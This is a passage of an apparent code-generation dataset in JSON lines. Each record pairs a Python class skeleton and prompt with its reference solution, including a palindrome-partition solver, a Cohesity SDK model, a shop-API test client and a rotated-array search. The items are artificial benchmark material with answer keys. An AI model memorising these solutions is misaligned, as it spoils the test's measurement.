"stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def minCut(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_0|>\n\n def minCut2(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n queue = deque([0])\n visited = set([0])\n depth = 0\n while queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\n return n - 1\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n @lru_cache(None)\n def dfs(index: int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\n return dfs(0) - 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000086", "length_bytes": 2494, "license_type": "no_license", "methods": [{"docstring": ":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。", "name": "minCut", "signature": "def minCut(self, s: str) -> int"}, {"docstring": ":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。", "name": "minCut2", "signature": "def minCut2(self, s: str) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minCut(self, s: str) -> int: :给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\n- def minCut2(self, s: str) -> int: :给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minCut(self, s: str) -> int: :给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\n- def minCut2(self, s: str) -> int: :给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\n\n<|skeleton|>\nclass Solution:\n\n def minCut(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_0|>\n\n def minCut2(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n queue = deque([0])\n visited = set([0])\n depth = 0\n while queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\n return n - 1\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n @lru_cache(None)\n def dfs(index: int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\n return dfs(0) - 1\n<|end_body_1|>\n", "revision_id": "7e79e26bb8f641868561b186e34c1127ed63c9e0", "skeleton": "<|skeleton|>\nclass Solution:\n\n def minCut(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_0|>\n\n def minCut2(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def minCut(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n queue = deque([0])\n visited = set([0])\n depth = 0\n while queue:\n curLen = len(queue)\n for _ in range(curLen):\n cur = queue.popleft()\n if cur == n:\n return depth - 1\n for next in adjMap[cur]:\n if next not in visited:\n visited.add(next)\n queue.append(next)\n depth += 1\n return n - 1\n\n def minCut2(self, s: str) -> int:\n \"\"\":给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是回文。 返回符合要求的 最少分割次数 。\"\"\"\n n = len(s)\n adjMap = defaultdict(set)\n for start in range(n):\n left, right = (start, start)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n left, right = (start, start + 1)\n while left >= 0 and right < n and (s[left] == s[right]):\n adjMap[left].add(right + 1)\n left -= 1\n right += 1\n\n @lru_cache(None)\n def dfs(index: int) -> int:\n if index >= n:\n return 0\n return min((1 + dfs(next) for next in adjMap[index]))\n return dfs(0) - 1\n", "source": "the_stack_v2_python_sparse", "source_path": "11_动态规划/dp分类/区间dp/dfs/回文/分割回文串/132_分割回文串-最短路建图.py", "source_repo": "981377660LMT/algorithm-study", "split": "test", "star_events_count": 225} {"blob_id": "fc0a960b86f0d98bf58a4f1720137d78acd42a85", "bodies": ["self.end_time_usecs = end_time_usecs\nself.error = error\nself.indexing_task_end_time_usecs = indexing_task_end_time_usecs\nself.indexing_task_start_time_usecs = indexing_task_start_time_usecs\nself.indexing_task_status = indexing_task_status\nself.indexing_task_uid = indexing_task_uid\nself.latest_expiry_time_usecs = latest_expiry_time_usecs\nself.progress_monitor_task = progress_monitor_task\nself.start_time_usecs = start_time_usecs", "if dictionary is None:\n return None\nend_time_usecs = dictionary.get('endTimeUsecs')\nerror = dictionary.get('error')\nindexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\nindexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\nindexing_task_status = dictionary.get('indexingTaskStatus')\nindexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\nlatest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\nprogress_monitor_task = dictionary.get('progressMonitorTask')\nstart_time_usecs = dictionary.get('startTimeUsecs')\nreturn cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)"], "bodies_text": "<|body_start_0|>\n self.end_time_usecs = end_time_usecs\n self.error = error\n self.indexing_task_end_time_usecs = indexing_task_end_time_usecs\n self.indexing_task_start_time_usecs = indexing_task_start_time_usecs\n self.indexing_task_status = indexing_task_status\n self.indexing_task_uid = indexing_task_uid\n self.latest_expiry_time_usecs = latest_expiry_time_usecs\n self.progress_monitor_task = progress_monitor_task\n self.start_time_usecs = start_time_usecs\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n end_time_usecs = dictionary.get('endTimeUsecs')\n error = dictionary.get('error')\n indexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\n indexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\n indexing_task_status = dictionary.get('indexingTaskStatus')\n indexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\n latest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\n progress_monitor_task = dictionary.get('progressMonitorTask')\n start_time_usecs = dictionary.get('startTimeUsecs')\n return cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st", "class_name": "RemoteRestoreIndexingStatus", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RemoteRestoreIndexingStatus:\n \"\"\"Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st\"\"\"\n\n def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None):\n \"\"\"Constructor for the RemoteRestoreIndexingStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.end_time_usecs = end_time_usecs\n self.error = error\n self.indexing_task_end_time_usecs = indexing_task_end_time_usecs\n self.indexing_task_start_time_usecs = indexing_task_start_time_usecs\n self.indexing_task_status = indexing_task_status\n self.indexing_task_uid = indexing_task_uid\n self.latest_expiry_time_usecs = latest_expiry_time_usecs\n self.progress_monitor_task = progress_monitor_task\n self.start_time_usecs = start_time_usecs\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n end_time_usecs = dictionary.get('endTimeUsecs')\n error = dictionary.get('error')\n indexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\n indexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\n indexing_task_status = dictionary.get('indexingTaskStatus')\n indexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\n latest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\n progress_monitor_task = dictionary.get('progressMonitorTask')\n start_time_usecs = dictionary.get('startTimeUsecs')\n return cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000087", "length_bytes": 5666, "license_type": "permissive", "methods": [{"docstring": "Constructor for the RemoteRestoreIndexingStatus class", "name": "__init__", "signature": "def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005922", "prompt": "Implement the Python class `RemoteRestoreIndexingStatus` described below.\n\nClass description:\nImplementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st\n\nMethod signatures and docstrings:\n- def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None): Constructor for the RemoteRestoreIndexingStatus class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `RemoteRestoreIndexingStatus` described below.\n\nClass description:\nImplementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st\n\nMethod signatures and docstrings:\n- def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None): Constructor for the RemoteRestoreIndexingStatus class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass RemoteRestoreIndexingStatus:\n \"\"\"Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st\"\"\"\n\n def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None):\n \"\"\"Constructor for the RemoteRestoreIndexingStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.end_time_usecs = end_time_usecs\n self.error = error\n self.indexing_task_end_time_usecs = indexing_task_end_time_usecs\n self.indexing_task_start_time_usecs = indexing_task_start_time_usecs\n self.indexing_task_status = indexing_task_status\n self.indexing_task_uid = indexing_task_uid\n self.latest_expiry_time_usecs = latest_expiry_time_usecs\n self.progress_monitor_task = progress_monitor_task\n self.start_time_usecs = start_time_usecs\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n end_time_usecs = dictionary.get('endTimeUsecs')\n error = dictionary.get('error')\n indexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\n indexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\n indexing_task_status = dictionary.get('indexingTaskStatus')\n indexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\n latest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\n progress_monitor_task = dictionary.get('progressMonitorTask')\n start_time_usecs = dictionary.get('startTimeUsecs')\n return cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass RemoteRestoreIndexingStatus:\n \"\"\"Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st\"\"\"\n\n def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None):\n \"\"\"Constructor for the RemoteRestoreIndexingStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RemoteRestoreIndexingStatus:\n \"\"\"Implementation of the 'RemoteRestoreIndexingStatus' model. Specifies the status of an indexing task. Attributes: end_time_usecs (long|int): Specifies the end time of the time range that is being indexed. The indexing task is creating an index of the Job Runs that occurred between the startTimeUsecs and this endTimeUsecs. This field is recorded as a Unix epoch Timestamp (in microseconds). error (string): Specifies the error message if the indexing Job/task fails. indexing_task_end_time_usecs (long|int): Specifies when the indexing task completed. This time is recorded as a Unix epoch Timestamp (in microseconds). This field is not set if the indexing task is still in progress. indexing_task_st\"\"\"\n\n def __init__(self, end_time_usecs=None, error=None, indexing_task_end_time_usecs=None, indexing_task_start_time_usecs=None, indexing_task_status=None, indexing_task_uid=None, latest_expiry_time_usecs=None, progress_monitor_task=None, start_time_usecs=None):\n \"\"\"Constructor for the RemoteRestoreIndexingStatus class\"\"\"\n self.end_time_usecs = end_time_usecs\n self.error = error\n self.indexing_task_end_time_usecs = indexing_task_end_time_usecs\n self.indexing_task_start_time_usecs = indexing_task_start_time_usecs\n self.indexing_task_status = indexing_task_status\n self.indexing_task_uid = indexing_task_uid\n self.latest_expiry_time_usecs = latest_expiry_time_usecs\n self.progress_monitor_task = progress_monitor_task\n self.start_time_usecs = start_time_usecs\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n end_time_usecs = dictionary.get('endTimeUsecs')\n error = dictionary.get('error')\n indexing_task_end_time_usecs = dictionary.get('indexingTaskEndTimeUsecs')\n indexing_task_start_time_usecs = dictionary.get('indexingTaskStartTimeUsecs')\n indexing_task_status = dictionary.get('indexingTaskStatus')\n indexing_task_uid = cohesity_management_sdk.models.universal_id.UniversalId.from_dictionary(dictionary.get('indexingTaskUid')) if dictionary.get('indexingTaskUid') else None\n latest_expiry_time_usecs = dictionary.get('latestExpiryTimeUsecs')\n progress_monitor_task = dictionary.get('progressMonitorTask')\n start_time_usecs = dictionary.get('startTimeUsecs')\n return cls(end_time_usecs, error, indexing_task_end_time_usecs, indexing_task_start_time_usecs, indexing_task_status, indexing_task_uid, latest_expiry_time_usecs, progress_monitor_task, start_time_usecs)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/remote_restore_indexing_status.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "ee13ea769fd21ec674b0316d052d7a3838685764", "bodies": ["url = host + '/api/goods/find'\ndata = {'sku': sku, 'gid': goods_id}\nr = requests.post(url=url, data=data).json()\nout_format('获取单品:', r)", "url = host + '/api/goods/line'\ndata = {'sku': sku, 'gid': goods_id}\nr = requests.post(url=url, data=data).json()\nout_format('获取单品价格和属性:', r)\nreturn r", "url = host + '/api/goods/comment'\ndata = {'gid': goods_id, 'size': '10', 'page': '1'}\nr = requests.post(url=url, json=data).json()\nout_format('获取评论列表:', r)\nreturn r"], "bodies_text": "<|body_start_0|>\n url = host + '/api/goods/find'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品:', r)\n<|end_body_0|>\n\n<|body_start_1|>\n url = host + '/api/goods/line'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品价格和属性:', r)\n return r\n<|end_body_1|>\n\n<|body_start_2|>\n url = host + '/api/goods/comment'\n data = {'gid': goods_id, 'size': '10', 'page': '1'}\n r = requests.post(url=url, json=data).json()\n out_format('获取评论列表:', r)\n return r\n<|end_body_2|>\n", "class_docstring": "", "class_name": "goods", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass goods:\n\n def get_goods(self):\n \"\"\"获取单品 :return: gid\"\"\"\n <|body_0|>\n\n def get_price(self):\n \"\"\"获取单品价格和属性 :return:\"\"\"\n <|body_1|>\n\n def get_comment(self):\n \"\"\"获取评论列表 gid:产品id size:记录条数 page:页码 :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = host + '/api/goods/find'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品:', r)\n<|end_body_0|>\n\n<|body_start_1|>\n url = host + '/api/goods/line'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品价格和属性:', r)\n return r\n<|end_body_1|>\n\n<|body_start_2|>\n url = host + '/api/goods/comment'\n data = {'gid': goods_id, 'size': '10', 'page': '1'}\n r = requests.post(url=url, json=data).json()\n out_format('获取评论列表:', r)\n return r\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000088", "length_bytes": 1426, "license_type": "no_license", "methods": [{"docstring": "获取单品 :return: gid", "name": "get_goods", "signature": "def get_goods(self)"}, {"docstring": "获取单品价格和属性 :return:", "name": "get_price", "signature": "def get_price(self)"}, {"docstring": "获取评论列表 gid:产品id size:记录条数 page:页码 :return:", "name": "get_comment", "signature": "def get_comment(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002852", "prompt": "Implement the Python class `goods` described below.\n\nClass description:\nImplement the goods class.\n\nMethod signatures and docstrings:\n- def get_goods(self): 获取单品 :return: gid\n- def get_price(self): 获取单品价格和属性 :return:\n- def get_comment(self): 获取评论列表 gid:产品id size:记录条数 page:页码 :return:", "prompted_full_text": "Implement the Python class `goods` described below.\n\nClass description:\nImplement the goods class.\n\nMethod signatures and docstrings:\n- def get_goods(self): 获取单品 :return: gid\n- def get_price(self): 获取单品价格和属性 :return:\n- def get_comment(self): 获取评论列表 gid:产品id size:记录条数 page:页码 :return:\n\n<|skeleton|>\nclass goods:\n\n def get_goods(self):\n \"\"\"获取单品 :return: gid\"\"\"\n <|body_0|>\n\n def get_price(self):\n \"\"\"获取单品价格和属性 :return:\"\"\"\n <|body_1|>\n\n def get_comment(self):\n \"\"\"获取评论列表 gid:产品id size:记录条数 page:页码 :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = host + '/api/goods/find'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品:', r)\n<|end_body_0|>\n\n<|body_start_1|>\n url = host + '/api/goods/line'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品价格和属性:', r)\n return r\n<|end_body_1|>\n\n<|body_start_2|>\n url = host + '/api/goods/comment'\n data = {'gid': goods_id, 'size': '10', 'page': '1'}\n r = requests.post(url=url, json=data).json()\n out_format('获取评论列表:', r)\n return r\n<|end_body_2|>\n", "revision_id": "0ebaae335de2f1633e31c4fc3f60e556220a8bfb", "skeleton": "<|skeleton|>\nclass goods:\n\n def get_goods(self):\n \"\"\"获取单品 :return: gid\"\"\"\n <|body_0|>\n\n def get_price(self):\n \"\"\"获取单品价格和属性 :return:\"\"\"\n <|body_1|>\n\n def get_comment(self):\n \"\"\"获取评论列表 gid:产品id size:记录条数 page:页码 :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class goods:\n def get_goods(self):\n \"\"\"获取单品 :return: gid\"\"\"\n url = host + '/api/goods/find'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品:', r)\n\n def get_price(self):\n \"\"\"获取单品价格和属性 :return:\"\"\"\n url = host + '/api/goods/line'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品价格和属性:', r)\n return r\n\n def get_comment(self):\n \"\"\"获取评论列表 gid:产品id size:记录条数 page:页码 :return:\"\"\"\n url = host + '/api/goods/comment'\n data = {'gid': goods_id, 'size': '10', 'page': '1'}\n r = requests.post(url=url, json=data).json()\n out_format('获取评论列表:', r)\n return r\n", "source": "the_stack_v2_python_sparse", "source_path": "Atle/interface/framework/base/aGoods.py", "source_repo": "shiqi0128/My_scripts", "split": "test", "star_events_count": 0} {"blob_id": "3d86b31ad8ff1b0ae3aead31b19c2fe7da4941a0", "bodies": ["res = False\nif not nums:\n return False\npivot = self.find_pivot(nums, 0, len(nums) - 1)\nif pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\nelif nums[pivot] == target:\n res = pivot\nelif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\nelse:\n res = self.binary_search(nums, target, pivot + 1, len(nums) - 1)\nreturn res >= 0", "while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\nreturn -1", "if low > high:\n return -1\nif low == high:\n return low\nmid = int((low + high) / 2)\nif mid < high and nums[mid] > nums[mid + 1]:\n return mid\nelif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\nelif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\nelif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\nelse:\n return self.find_pivot(nums, mid + 1, high)", "if not nums:\n return False\nl, r = (0, len(nums) - 1)\nwhile l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\nreturn False"], "bodies_text": "<|body_start_0|>\n res = False\n if not nums:\n return False\n pivot = self.find_pivot(nums, 0, len(nums) - 1)\n if pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\n elif nums[pivot] == target:\n res = pivot\n elif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\n else:\n res = self.binary_search(nums, target, pivot + 1, len(nums) - 1)\n return res >= 0\n<|end_body_0|>\n\n<|body_start_1|>\n while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if low > high:\n return -1\n if low == high:\n return low\n mid = int((low 